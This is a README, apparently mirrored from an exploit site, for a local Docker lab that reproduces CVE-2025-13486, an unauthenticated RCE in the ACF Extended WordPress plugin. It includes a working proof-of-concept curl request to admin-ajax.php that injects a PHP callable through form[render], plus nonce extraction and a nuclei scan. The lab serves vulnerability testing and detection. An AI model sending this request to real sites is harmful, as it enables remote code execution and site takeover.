Share
## https://sploitus.com/exploit?id=A38E4D03-C599-51F3-BBD0-B77463B708A9
# CVE-2025-13486 Vulnerable Test Environment

One-shot Docker setup for testing ACF Extended RCE vulnerability.

## Quick Start

```bash
# 1. Download plugins (run once)
./download-plugins.sh

# 2. Start environment
docker-compose up -d --build

# 3. Wait ~30 seconds for setup, then test
nuclei -t ../repo/http/cves/2025/CVE-2025-13486.yaml -u http://localhost:8888
```

## Manual Plugin Setup

If the download script fails, manually place these files in `plugins/`:

1. **ACF Pro** (required dependency)
   - Download from: https://www.advancedcustomfields.com/pro/
   - Save as: `plugins/acf-pro.zip`

2. **ACF Extended 0.9.0.5** (vulnerable version)
   - Download from: https://downloads.wordpress.org/plugin/acf-extended.0.9.0.5.zip
   - Save as: `plugins/acf-extended.zip`

## Testing the Exploit

```bash
# Extract nonce from homepage
curl -s http://localhost:8888/ | grep -oP '"nonce":"([a-f0-9]+)"'

# Test RCE with print_r
curl -X POST http://localhost:8888/wp-admin/admin-ajax.php \
  -d "action=acfe/form/render_form_ajax&nonce=&form[render]=print_r&form[test]=PWNED"
```

## Cleanup

```bash
docker-compose down -v
```

## Vulnerability Details

- **CVE**: CVE-2025-13486
- **Affected**: ACF Extended 0.9.0.5 - 0.9.1.1
- **Type**: Unauthenticated RCE via `call_user_func_array()`
- **CVSS**: 9.8 (Critical)